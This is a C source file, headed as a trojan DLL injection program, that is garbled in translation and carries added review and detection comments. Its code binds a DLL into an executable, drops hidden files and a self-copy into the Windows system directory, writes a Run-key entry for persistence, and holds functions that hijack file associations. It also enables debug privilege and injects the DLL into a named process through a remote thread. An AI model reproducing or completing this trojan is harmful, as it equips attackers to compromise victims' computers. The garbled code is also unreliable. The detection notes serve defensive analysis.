/*************************************** ***************
Name: trojan dll injection program
Function: Call the system hook to inject the trojan dll into the host thread.
Author: Xue Feng
Date: 2004-6-22
Description: Process hiding. This program uses a large number of APIs. For details, refer to msdn.
**************************************** **************/
# Include "stdafx. H"
# Include <tlhelp32.h>
# Include ".. // include // datastruct. H"
// EXE file name
// Filled by getmodulenameex() with this executable's base name. Later used as
// the value name for the Run-key entry (setprogautorun/isprogautorun) and as
// the file name to read and copy in performancefileexa/checkfileexa. None of
// the writers receives a buffer size, so the 51-byte bound is not enforced.
Char g_exename [51];
// Trojan dll File Name
// Filled by checkfileexa() from the trailer record's cockdllname field and
// passed to runviruscodeex() as the string written into the host process.
// It is a bare file name, not a path.
Char g_cockname [51];
// Obtain the EXE file name *. exe
/**
 * Copies this executable's base file name (the text after the last backslash
 * of GetModuleFileName's result) into BUF.
 *
 * @param BUF  caller-provided buffer. No size is passed, so the copy is
 *             unbounded; the only caller on this page passes the 51-byte
 *             global g_exename.
 *
 * If GetModuleFileName fails, BUF is left untouched.
 */
Void getmodulenameex (lptstr BUF)
{
Char path [max_path];
// Full path of the running module.
If (getmodulefilename (: getmodulehandle (null), path, max_path ))
{
// 92 is the ASCII code of '\\': P points at the last path separator.
Lptstr P = strrchr (path, 92 );
// Exactly strlen(p+1) bytes are copied, so strncpy writes no terminator here;
// the string is ended by the strncat below (strncat always appends one).
Strncpy (BUF, & P [1], strlen (p + 1 ));
// The one-character literal is garbled in this copy; as printed it appends a
// space to the name. NOTE(review): strncat locates the end of BUF by its first
// NUL, which for the zero-initialised global lands right after the copy.
Strncat (BUF ," ", 1 );
}
}
// Virus File merging Program (API version) New!
/**
 * Appends the DLL named by lpcockfile to the end of the executable named by
 * lpprogfile, followed by a filedis trailer record (identifier string, both
 * file names, both sizes, isfilereduced = 0). performancefileexa() and
 * checkfileexa() read that trailer back from the tail of the file.
 *
 * @param lpprogfile  executable opened read/write and extended in place
 * @param lpcockfile  DLL whose body is copied into the executable
 * @return 1 on success, 0 on any API failure. Every early return leaves the
 *         handles opened so far and cbufcock unreleased.
 *
 * Detection note: the output is a PE with an overlay (data after the image)
 * that ends in a fixed marker string. The marker value is the fileidentifier
 * constant from the included datastruct header; it is not shown on this page.
 */
DWORD unitefileexa (lpstr lpprogfile, lpstr lpcockfile)
{
Handle hprog = NULL, hcock = NULL;
// Trailer record type; its fields are declared in the datastruct header.
Filedis;
DWORD dwprog = 0, dwcock = 0, dwnumber = 0;
Char * cbufcock = NULL;
// The strncpy calls below copy exactly strlen(src) bytes and add no
// terminator; the zeroed record is what terminates the strings.
Memset (& filedis, 0, sizeof (filedis ));
// Save the file name
Strncpy (filedis. fileidentifier, fileidentifier, strlen (fileidentifier ));
Strncpy (filedis. progname, lpprogfile, strlen (lpprogfile ));
Strncpy (filedis. cockdllname, lpcockfile, strlen (lpcockfile ));
// Set the decomposition ID to 0.
Filedis. isfilereduced = 0;
// Open the file and return if the call fails.
Hprog = createfile (lpprogfile, generic_read | generic_write, file_share_read, null,
Open_existing, file_attribute_normal, null );
If (hprog = invalid_handle_value)
{
Return 0;
}
// "file_assist_read" appears to be a garbled FILE_SHARE_READ in this copy.
// Returning here leaks hprog.
Hcock = createfile (lpcockfile, generic_read, file_assist_read, null, open_existing,
File_attribute_normal, null );
If (hcock = invalid_handle_value)
{
Return 0;
}
// EXE file size
Dwprog = getfilesize (hprog, null );
// Trojan dll File Size
Dwcock = getfilesize (hcock, null );
// Save it to the file header record
Filedis. progsize = dwprog;
Filedis. cockdllsize = dwcock;
// Apply for a data buffer for the DLL file and use it to read data
// No null check; whether new[] throws or returns NULL depends on the
// compiler/runtime of the era — not determinable from this page.
Cbufcock = new char [dwcock + 1];
// Move the file pointer to the end of the EXE file
If (setfilepointer (hprog, 0, null, file_end) = 0 xffffffff)
{
Return 0;
}
// Read the trojan dll file body data to the buffer zone
// dwnumber (bytes actually read) is never compared with dwcock, so a short
// read would still be written out below at full length.
If (! Readfile (hcock, cbufcock, dwcock, & dwnumber, null ))
{
Return 0;
}
// Write the DLL file body of the Trojan program
If (! Writefile (hprog, cbufcock, dwcock, & dwnumber, null ))
{
Return 0;
}
// Write the file header data to the end of the merged File
// The trailer is the last sizeof(filedis) bytes of the file, which is how the
// readers locate it (SetFilePointer(-sizeof, FILE_END)).
If (! Writefile (hprog, & filedis, sizeof (filedis), & dwnumber, null ))
{
Return 0;
}
// Close the file pointer
Closehandle (hprog );
Closehandle (hcock );
// Release the memory
Delete [] cbufcock;
Return 1;
}
// Virus File decomposition Program (API version), and can copy itself to the specified directory. New!
/**
 * Splits a file produced by unitefileexa(): reads the trailer from the tail of
 * progname, checks its identifier, then writes the embedded executable (with
 * a trailer marked isfilereduced = 1 appended) and the embedded DLL as new
 * files under destfiledir. It also copies the whole original file into a
 * hidden "service" subdirectory of destfiledir and marks the three outputs
 * hidden and read-only. The only caller on this page passes the Windows
 * system directory as destfiledir.
 *
 * @param progname     path of the merged file to read
 * @param destfiledir  directory that receives the dropped files
 * @return 1 on success; 0 when open, seek, read, identifier check, create or
 *         write fails (one path returns false, the same value). Early returns
 *         leave open handles and the new[] buffers unreleased.
 *
 * Forensic artifacts: an executable and a DLL in destfiledir carrying
 * FILE_ATTRIBUTE_HIDDEN | FILE_ATTRIBUTE_READONLY, a hidden "service" folder
 * containing a copy of the dropper, and the trailer record at the tail of the
 * dropped executable (hidden files/directories: ATT&CK T1564.001).
 */
DWORD performancefileexa (lpcstr progname, lpcstr destfiledir)
{
Handle hprog = NULL, hprogdest = NULL, hcock = NULL, htemp = NULL;
Filedis;
Long lstruct = 0;
DWORD dwnumber = 0, dwunite = 0;
Char * cbufprog = NULL, * cbufcock = NULL, * buftemp = NULL;
// Stack buffers; only progfilepath and cockfilepath are fully initialised
// (via strcpy) before being appended to.
Char progfilepath [max_path], cockfilepath [max_path], tempfilepath [max_path];
Memset (& filedis, 0, sizeof (filedis ));
// First open the merged File
Hprog = createfile (progname, generic_read, file_assist_read, null, open_existing,
File_attribute_normal, null );
If (hprog = invalid_handle_value)
{
Return 0;
}
// Negative offset from FILE_END: the trailer occupies the last
// sizeof(filedis) bytes of the file.
Lstruct = sizeof (filedis );
Lstruct =-lstruct;
// Move the file Pointer Forward from the tail
If (setfilepointer (hprog, lstruct, null, file_end) = 0 xffffffff)
{
Return 0;
}
// Read the file header
If (! Readfile (hprog, & filedis, sizeof (filedis), & dwnumber, null ))
{
Return 0;
}
// Check whether the file is legal
// Only the identifier string is validated; progsize/cockdllsize from the
// trailer are trusted as-is for the allocations and reads below.
If (strncmp (filedis. fileidentifier, fileidentifier, strlen (fileidentifier ))! = 0)
{
Return 0;
}
// Allocate memory and request data buffer
Cbufprog = new char [filedis. progsize + 1];
Cbufcock = new char [filedis. cockdllsize + 1];
/*************************************** **************************************** *****
// Create the target file path
// Int ilen = strlen (destfiledir );
// Strncpy (progfilepath, destfiledir, ilen );
// Strncat (progfilepath, "//", 1 );
// Strncat (progfilepath, filedis. progname, strlen (filedis. progname ));
// Strncpy (hookfilepath, destfiledir, ilen );
// Strncat (hookfilepath, "//", 1 );
// Strncat (hookfilepath, filedis. hookdllname, strlen (filedis. hookdllname ));
// Strncpy (cockfilepath, destfiledir, ilen );
// Strncat (cockfilepath, "//", 1 );
// Strncat (cockfilepath, filedis. cockdllname, strlen (filedis. cockdllname ));
**************************************** **************************************** *****/
// Output paths: destfiledir + separator + name from the trailer. The "//"
// separator literal looks garbled in this copy (presumably "\\"). Unbounded
// strcpy/strcat into max_path-sized arrays.
Strcpy (progfilepath, destfiledir );
Strcat (progfilepath ,"//");
Strcat (progfilepath, filedis. progname );
Strcpy (cockfilepath, destfiledir );
Strcat (cockfilepath ,"//");
Strcat (cockfilepath, filedis. cockdllname );
// Create and open the EXE file
// create_new fails when the target already exists, so a second run over an
// existing drop returns 0 here.
Hprogdest = createfile (progfilepath, generic_write, file_pai_read, null, create_new,
File_attribute_normal, null );
If (hprogdest = invalid_handle_value)
{
Return 0;
}
// Create and open the trojan dll File
Hcock = createfile (cockfilepath, generic_write, file_assist_read, null, create_new,
File_attribute_normal, null );
If (hcock = invalid_handle_value)
{
Return 0;
}
// File pointer to start
// Returns false here where the other failure paths return 0 (same value).
If (setfilepointer (hprog, 0, null, file_begin) = 0 xffffffff)
{
Return false;
}
// Read the EXE file body data in the merged File
// The reads below use the sizes recorded in the trailer; dwnumber is not
// checked against them.
If (! Readfile (hprog, cbufprog, filedis. progsize, & dwnumber, null ))
{
Return 0;
}
// Read the trojan dll file data in the merged File
If (! Readfile (hprog, cbufcock, filedis. cockdllsize, & dwnumber, null ))
{
Return 0;
}
// Write the EXE data to the newly created EXE file
If (! Writefile (hprogdest, cbufprog, filedis. progsize, & dwnumber, null ))
{
Return 0;
}
// Write the file header to the end of the EXE
// The dropped executable keeps a trailer too, flagged as already split, which
// is what checkfileexa() later reads to decide whether to drop again.
Filedis. isfilereduced = 1; // the file has been decomposed.
If (! Writefile (hprogdest, & filedis, sizeof (filedis), & dwnumber, null ))
{
Return 0;
}
// Write DLL data to the newly created DLL file
If (! Writefile (hcock, cbufcock, filedis. cockdllsize, & dwnumber, null ))
{
Return 0;
}
// Copy your own code
// strncpy with strlen(src) writes no terminator into the uninitialised
// tempfilepath; where strncat then finds the "end" of the string depends on
// the stack contents — NOTE(review): not well-defined as written.
Strncpy (tempfilepath, destfiledir, strlen (destfiledir ));
Strncat (tempfilepath, "// service", 8 );
Createdirectory (tempfilepath, null );
// Hide a folder
Setfileattributes (tempfilepath, file_attribute_hidden );
Strncat (tempfilepath, "//", 1 );
Strncat (tempfilepath, progname, strlen (progname ));
// Self-copy into the hidden folder; silently skipped if the file exists or
// creation fails. The read/write results in the branch are not checked.
Htemp = createfile (tempfilepath, generic_write, file_assist_read, null, create_new,
File_attribute_normal, null );
If (htemp! = Invalid_handle_value)
{
Dwunite = getfilesize (hprog, null );
Buftemp = new char [dwunite + 1];
Setfilepointer (hprog, 0, null, file_begin );
Readfile (hprog, buftemp, dwunite, & dwnumber, null );
Writefile (htemp, buftemp, dwunite, & dwnumber, null );
}
// Close the file pointer
Closehandle (hprog );
Closehandle (hprogdest );
Closehandle (hcock );
Closehandle (htemp );
// Release the memory
// buftemp may still be NULL here; delete[] NULL is a no-op.
Delete [] cbufprog;
Delete [] cbufcock;
Delete [] buftemp;
// Modify the attributes of the four files to: hidden and read-only.
// Three files are touched despite the comment; attribute results unchecked.
Setfileattributes (progfilepath, file_attribute_hidden | file_attribute_readonly );
Setfileattributes (cockfilepath, file_attribute_hidden | file_attribute_readonly );
Setfileattributes (tempfilepath, file_attribute_hidden | file_attribute_readonly );
Return 1;
}
/*
Set the registry and run the trojan program automatically upon startup. If the call is successful, 1 is returned. If the call fails, 0 is returned.
Regkeyname: key name in the registry; exepath: absolute path of the Trojan program
*/
/**
 * Persistence through the HKLM ...\CurrentVersion\Run key (ATT&CK T1547.001):
 * creates or opens the key and sets a REG_SZ value whose name is regkeyname
 * with everything from its last '.' removed and whose data is exepath.
 *
 * @param regkeyname  file name the value name is derived from (the parameter
 *                    list is garbled on this page; names are taken from the
 *                    body and the comment above)
 * @param exepath     path stored as the value data
 * @return 1 on success, 0 if the key cannot be created or the value not set.
 *
 * Detection: a value written to this key by a process that has just copied
 * itself into the system directory is a high-signal event (e.g. Sysmon
 * Event ID 13, registry value set).
 */
Byte setprogautorun (maid)
{
Hkey = NULL;
DWORD dwdis = 0;
Char keyname [51], Buf [51];
Lptstr P = NULL;
// Key path literal uses the garbled "//" separators seen elsewhere in this copy.
If (regcreatekeyex (HKEY_LOCAL_MACHINE, "software // Microsoft // windows // CurrentVersion // run ",
0, null, reg_option_non_volatile, key_all_access, null, & hkey, & dwdis )! = Error_success)
{
Return 0;
}
// Copies strlen(regkeyname) bytes, no terminator, into the uninitialised Buf.
Strncpy (BUF, regkeyname, strlen (regkeyname ));
// 46 is ASCII '.'; P marks the extension. NOTE(review): P is not checked for
// NULL, so a name without a '.' would make p-BUF negative below.
P = strrchr (BUF, 46 );
// Value name = base name without extension; the assignment that follows
// writes the terminator (its character literal is garbled in this copy).
Strncpy (keyname, Buf, p-BUF );
Keyname [(DWORD) (p-BUF)] =' ';
// Data length is strlen(exepath) bytes, i.e. without the terminating NUL.
If (regsetvalueex (hkey, keyname, 0, REG_SZ, (byte *) exepath, strlen (exepath ))! =
Error_success)
{
Regclosekey (hkey );
Return 0;
}
Regclosekey (hkey );
Return 1;
}
// Check whether automatic running has been set in the registry; 1 indicates that the operation has been set; 0 indicates that the operation has not been set; 2 indicates that the operation fails due to a key error.
/**
 * Checks whether a Run-key value named regkeyname exists under
 * HKLM ...\CurrentVersion\Run.
 *
 * @param regkeyname  value name to query
 * @return 1 if the query succeeds, 0 if it fails, 2 if the key cannot be
 *         opened.
 *
 * The opened key is never closed on the 1/0 paths. Note the value name
 * queried here is the raw name, whereas setprogautorun() strips the
 * extension before writing, so the two may not refer to the same value.
 */
Byte isprogautorun (lpcstr regkeyname)
{
Hkey = NULL;
If (regopenkeyex (HKEY_LOCAL_MACHINE, "software // Microsoft // windows // CurrentVersion // run ",
0, key_execute, & hkey )! = Error_success)
{
Return 2;
}
// Only three arguments survive in this copy; the trailing type/data/size
// parameters of RegQueryValueEx are missing.
If (regqueryvalueex (hkey, regkeyname, null) = error_success)
{
Return 1;
}
Else
{
Return 0;
}
}
// Modify the file-related function
/**
 * Hijacks the default open command for .txt, .exe and .com files
 * (ATT&CK T1546.001, change default file association): rewrites the
 * (Default) value of HKCR\txtfile|exefile|comfile\shell\open\command to
 * lplinkfile followed by a "%1"-style argument string, so every launch of
 * those file types goes through lplinkfile first.
 *
 * @param lplinkfile  path placed in front of the original command arguments
 *
 * Not called on this page (the call in initializationex() is commented out).
 * Return values of RegSetValueEx are ignored.
 *
 * Detection: writes to HKCR\*\shell\open\command from a non-installer process;
 * restoring the association is the immediate remediation step.
 */
Void modifyfilelink (lpcstr lplinkfile)
{
Hkey = NULL;
DWORD dwdis = 0;
// Stack arrays; filled by strncpy without a terminator before strncat appends.
Char linkfiletxt [max_path], linkfileexe [max_path];
// Modify the TXT file association
If (regcreatekeyex (hkey_classes_root, "txtfile // shell // open // command", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Strncpy (linkfiletxt, lplinkfile, strlen (lplinkfile ));
// Argument literal is garbled in this copy (printed as "% 1").
Strncat (linkfiletxt, "% 1", 3 );
Regsetvalueex (hkey, null, 0, reg_expand_sz, (byte *) linkfiletxt, strlen (linkfiletxt ));
Regclosekey (hkey );
}
// Modify the EXE file association
If (regcreatekeyex (hkey_classes_root, "exefile // shell // open // command", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Strncpy (linkfileexe, lplinkfile, strlen (lplinkfile ));
// Garbled literal; 12 bytes appended.
Strncat (linkfileexe, "% 1" % * ", 12 );
Regsetvalueex (hkey, null, 0, REG_SZ, (byte *) linkfileexe, strlen (linkfileexe ));
Regclosekey (hkey );
}
// Modify the COM file association
// Reuses linkfileexe; if the exefile branch above was skipped, this writes
// the uninitialised array.
If (regcreatekeyex (hkey_classes_root, "comfile // shell // open // command", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Regsetvalueex (hkey, null, 0, REG_SZ, (byte *) linkfileexe, strlen (linkfileexe ));
Regclosekey (hkey );
}
}
// Modify the default file icon and save the icon resource to the trojan dll.
/**
 * Rewrites the (Default) value of HKCR\txtfile|exefile|comfile\DefaultIcon.
 * Despite the comment above, the data written is the same
 * lplinkfile + "%1"-style strings as in modifyfilelink(), not an icon
 * resource reference.
 *
 * @param lplinkfile  path written into the DefaultIcon values
 *
 * Not called anywhere on this page. RegSetValueEx results are ignored; the
 * value type differs between branches (reg_expand_sz for txt/com, REG_SZ for
 * exe).
 */
Void modifyfileicon (lpcstr lplinkfile)
{
Hkey = NULL;
DWORD dwdis = 0;
Char linkfiletxt [max_path], linkfileexe [max_path];
// Modify the TXT file icon
If (regcreatekeyex (hkey_classes_root, "txtfile // defaulticon", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
// strncpy with strlen(src): no terminator before strncat appends.
Strncpy (linkfiletxt, lplinkfile, strlen (lplinkfile ));
Strncat (linkfiletxt, "% 1", 3 );
Regsetvalueex (hkey, null, 0, reg_expand_sz, (byte *) linkfiletxt, strlen (linkfiletxt ));
Regclosekey (hkey );
}
// Modify the EXE file icon
If (regcreatekeyex (hkey_classes_root, "exefile // defaulticon", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Strncpy (linkfileexe, lplinkfile, strlen (lplinkfile ));
// Garbled literal in this copy; 12 bytes appended.
Strncat (linkfileexe, "% 1" % * ", 12 );
Regsetvalueex (hkey, null, 0, REG_SZ, (byte *) linkfileexe, strlen (linkfileexe ));
Regclosekey (hkey );
}
// Modify the COM file icon
// linkfileexe is only populated if the exefile branch ran.
If (regcreatekeyex (hkey_classes_root, "comfile // defaulticon", 0, null,
Reg_option_non_volatile, key_all_access, null, & hkey, & dwdis) = error_success)
{
Regsetvalueex (hkey, null, 0, reg_expand_sz, (byte *) linkfileexe, strlen (linkfileexe ));
Regclosekey (hkey );
}
}
// Check whether the virus file has been decomposed (API version). 0: not decomposed, 1: decomposed, 2: Call failed, and 3: The file is invalid. New!
/**
 * Reads the trailer record from the tail of progname and reports its state.
 *
 * @param progname  file to inspect (the caller passes its own executable name)
 * @return 0 trailer present and isfilereduced == 0 (not yet split)
 *         1 trailer present and isfilereduced != 0 (already split)
 *         2 open / seek / read failed (the 2-paths leave hprog open)
 *         3 identifier mismatch
 *
 * Side effect: on a valid trailer, copies cockdllname into the global
 * g_cockname (no terminator written; relies on the global being zeroed).
 */
DWORD checkfileexa (lpcstr progname)
{
Handle hprog = NULL;
Filedis;
Long lstruct = 0;
// Bret holds the result code; declared DWORD although initialised with false.
DWORD dwnumber = 0, Bret = false;
Memset (& filedis, 0, sizeof (filedis ));
// First open the merged File
Hprog = createfile (progname, generic_read, file_assist_read, null, open_existing,
File_attribute_normal, null );
If (hprog = invalid_handle_value)
{
Return 2;
}
// Negative offset from FILE_END: trailer is the last sizeof(filedis) bytes.
Lstruct = sizeof (filedis );
Lstruct =-lstruct;
// Move the file Pointer Forward from the tail
If (setfilepointer (hprog, lstruct, null, file_end) = 0 xffffffff)
{
Return 2;
}
// Read the file header
If (! Readfile (hprog, & filedis, sizeof (filedis), & dwnumber, null ))
{
Return 2;
}
// Check whether the file is legal
If (strncmp (filedis. fileidentifier, fileidentifier, strlen (fileidentifier) = 0)
{
// Save the trojan dll File Name
// Unbounded with respect to the 51-byte g_cockname.
Strncpy (g_cockname, filedis. cockdllname, strlen (filedis. cockdllname ));
// Check whether the file has been decomposed
If (filedis. isfilereduced)
{
Bret = 1;
}
Else
{
Bret = 0;
}
}
Else
{
// Invalid
Bret = 3;
}
Closehandle (hprog );
Return Bret;
}
// Find the Memory Sharing area and check whether the trojan program is started. Return 0: not started, 1: started, 2: failed to map to the sharing Area
/**
 * Checks a named shared-memory section (name: the sharedmemname constant from
 * the datastruct header, not shown here) for a running-instance flag.
 *
 * @return 0 no section exists, or it exists and iscockrun is clear
 *         1 section exists and iscockrun is set
 *         2 section exists but MapViewOfFile failed
 *
 * The mapping handle is deliberately not closed on the 0/1 paths (the
 * CloseHandle is commented out), so it stays open for the process lifetime.
 *
 * Detection note: the named section object is a live artifact that handle
 * enumeration tools can surface while the process runs.
 */
Byte lookupsharedmem ()
{
Handle hmapping = NULL;
// Pointer to the shared record; type and variable names coincide in this copy.
Lpsharedmem = NULL;
Byte Bret = 0;
// Check whether the specified shared area has been created
Hmapping = openfilemapping (file_map_all_access, false, sharedmemname );
If (hmapping)
{
// Map the shared area pointer
Lpsharedmem = (lpsharedmem) mapviewoffile (hmapping, file_map_all_access, 0, 0, 0 );
If (lpsharedmem)
{
// The Trojan program is not started.
If (! Lpsharedmem-> iscockrun)
{
Bret = 0;
}
Else
{
// Trojan started
Bret = 1;
}
}
Else
{
Closehandle (hmapping );
// Failed to map the shared area
Return 2;
}
}
Else
{
// No shared area, Trojan not started
Return 0;
}
Unmapviewoffile (lpsharedmem );
// Closehandle (hmapping );
Return Bret;
}
// Escalate the process permission
/**
 * Enables SeDebugPrivilege on the current process token.
 *
 * @return 1 if OpenProcessToken, LookupPrivilegeValue and
 *         AdjustTokenPrivileges all returned non-zero, else 0. The two inner
 *         failure paths return without closing htoken.
 *
 * NOTE(review): AdjustTokenPrivileges can return non-zero without having
 * assigned the privilege (GetLastError is not consulted), so 1 does not
 * confirm the privilege is held.
 *
 * Detection: enabling SeDebugPrivilege shortly before OpenProcess on another
 * process is a common injection precursor; privilege-use auditing and token
 * adjustment telemetry surface it.
 */
DWORD setprocessprivilege ()
{
Handle htoken;
Token_privileges TP;
If (! Openprocesstoken (getcurrentprocess (), token_adjust_privileges, & htoken ))
{
Return 0;
}
Else
{
// Single privilege entry: SE_DEBUG_NAME, attribute SE_PRIVILEGE_ENABLED.
TP. privilegecount = 1;
If (! Lookupprivilegevalue (null, se_debug_name, & TP. Privileges [0]. luid ))
{
Return 0;
}
TP. Privileges [0]. Attributes = se_privilege_enabled;
If (! Adjusttokenprivileges (htoken, false, & TP, sizeof (TP), null, null ))
{
Return 0;
}
Closehandle (htoken );
}
Return 1;
}
// Obtain the host process id based on the EXE file name
/**
 * Looks up a process id by executable name using a Toolhelp process snapshot
 * (ATT&CK T1057, process discovery).
 *
 * @param lpcexename  executable name to match against szExeFile, compared
 *                    case-sensitively with strcmp (the parameter list is
 *                    garbled on this page; the name is taken from the body)
 * @return the first matching th32ProcessID, or 0 when lpcexename is NULL,
 *         the snapshot fails, or no process matches.
 *
 * Process32First's result is not checked before the do/while loop reads PE.
 */
DWORD getdestprocessid (maid)
{
Handle hprocesssnap = NULL;
DWORD dwprocessid = 0;
// If the lpcexename is not null, query the specified process ID.
If (lpcexename! = NULL)
{
// "createconlhelp32snapshot" appears to be a garbled CreateToolhelp32Snapshot.
Hprocesssnap = createconlhelp32snapshot (th32cs_snapprocess, 0 );
// NOTE(review): the API signals failure with INVALID_HANDLE_VALUE, which is
// not what a "> 0" comparison tests for.
If (hprocesssnap> 0)
{
Processentry32 PE;
// dwSize must be set before the Toolhelp calls.
PE. dwsize = sizeof (processentry32 );
Process32first (hprocesssnap, & PE );
Do
{
If (strcmp (PE. szexefile, lpcexename) = 0)
{
// Find the ID
Dwprocessid = PE. th32processid;
Break;
}
}
While (process32next (hprocesssnap, & PE ));
Closehandle (hprocesssnap );
}
}
Return dwprocessid;
}
// Inject the trojan dll into the host process using a remote thread. If the call succeeds, 1 is returned. Otherwise, 0 is returned.
/**
 * Loads the DLL named by lpcockfilename into process dwprocessid with the
 * CreateRemoteThread + LoadLibraryA pattern (ATT&CK T1055.001): allocates a
 * buffer in the target, writes the DLL name into it, resolves LoadLibraryA
 * in this process's kernel32 module and passes that address directly as the
 * remote thread's start routine, with the buffer as its argument.
 *
 * @param dwprocessid     target process id
 * @param lpcockfilename  DLL name (the caller passes the bare g_cockname)
 * @return 1 once the remote thread has been created, 0 on any API failure.
 *         The wait on the thread is commented out, so 1 does not mean the
 *         DLL loaded. Failure paths after OpenProcess leave hprocess open
 *         and the remote allocation in place.
 *
 * Detection: the OpenProcess / VirtualAllocEx / WriteProcessMemory /
 * CreateRemoteThread sequence is the textbook injection signature
 * (e.g. Sysmon Event ID 8 CreateRemoteThread and Event ID 10 ProcessAccess
 * with the access mask below); the injected module is visible in the
 * target's module list.
 */
DWORD runviruscodeex (DWORD dwprocessid, lpcstr lpcockfilename)
{
Handle hprocess = NULL, hthread = NULL;
DWORD dwlen = 0;
Char * plibaddr = NULL;
Hinstance hins = NULL;
Pthread_start_routine PSR = NULL;
// Access rights requested on the target: create thread, VM operation, VM write.
Hprocess = OpenProcess (process_create_thread | process_vm_operation | process_vm_write,
False, dwprocessid );
If (hprocess = NULL)
{
Return 0;
}
// Byte length of the name including its terminator.
Dwlen = (strlen (lpcockfilename) + 1) * sizeof (char );
Plibaddr = (char *) virtualallocex (hprocess, null, dwlen, mem_commit, page_readwrite );
If (plibaddr = NULL)
{
Return 0;
}
If (! Writeprocessmemory (hprocess, plibaddr, (lpvoid) lpcockfilename, dwlen, null ))
{
Return 0;
}
// Resolved in the calling process, not the target.
Hins = getmodulehandle ("Kernel32 ");
If (hins = NULL)
{
Return 0;
}
PSR = (pthread_start_routine) getprocaddress (hins, "loadlibrarya ");
If (PSR = NULL)
{
Return 0;
}
Hthread = createremotethread (hprocess, null, 0, PSR, plibaddr, 0, null );
If (hthread = NULL)
{
Return 0;
}
// Waitforsingleobject (hthread, infinite );
Closehandle (hthread );
Closehandle (hprocess );
Return 1;
}
// Initialize the program, new!
/**
 * Orchestrates one run. Does nothing when lookupsharedmem() reports the
 * running flag (return 1) or a mapping failure (return 2), since both are
 * non-zero. Otherwise, in order:
 *   1. resolve this executable's name and the system directory;
 *   2. if checkfileexa() reports "not yet split" (0), drop the embedded
 *      executable and DLL into the system directory; if it reports failure
 *      or an invalid file (2 or 3), stop;
 *   3. build <system dir>\<exe name> and, when isprogautorun() returns 0,
 *      register it under the Run key (a return of 2 skips registration);
 *   4. enable SeDebugPrivilege;
 *   5. poll the process list once per second until a process named
 *      "mycontrol.exe" (hard-coded) exists;
 *   6. inject g_cockname into it.
 *
 * Return values of the drop, registry and injection calls are ignored.
 *
 * Detection / IR summary of this sequence: new hidden files in the system
 * directory, a Run-key value, a SeDebugPrivilege adjustment, repeated
 * process snapshots, and a remote thread into the named host process.
 */
Void initializationex ()
{
DWORD dwprocessid = 0;
If (! Lookupsharedmem ())
{
Char Buf [max_path];
DWORD Bret = 0;
Getmodulenameex (g_exename );
// Buf receives the system directory; its return value is not checked.
Getsystemdirectory (BUF, max_path );
Bret = checkfileexa (g_exename );
// Bret is unsigned, so "< 1" is exactly the "not yet split" result 0.
If (Bret <1)
{
Performancefileexa (g_exename, Buf );
}
Else if (Bret> 1)
{
Return;
}
// Append separator (garbled "//" literal in this copy) and the exe name;
// strncat into the buffer filled by GetSystemDirectory.
Strncat (BUF, "//", 1 );
Strncat (BUF, g_exename, strlen (g_exename ));
If (isprogautorun (g_exename) = 0)
{
// Modify the Registry
Setprogautorun (g_exename, Buf );
}
// Modify the File Association
// Modifyfilelink (BUF );
// Improve process Permissions
Setprocessprivilege ();
// Loop until the process ID is found
// Busy-wait with a 1 s sleep; never times out.
While (! Dwprocessid)
{
Dwprocessid = getdestprocessid ("mycontrol.exe ");
Sleep (1000 );
}
// Embed the trojan dll into the host process and run the virus program
Runviruscodeex (dwprocessid, g_cockname );
}
}
// Windows program Portal
/**
 * GUI-subsystem entry point (no console window). Runs initializationex()
 * once and exits with 0 regardless of its outcome; command-line arguments
 * and the show-window flag are unused.
 */
Int apientry winmain (hinstance, hinstance hprevinstance, lpstr lpcmdline, int ncmdshow)
{
Initializationex ();
Return 0;
}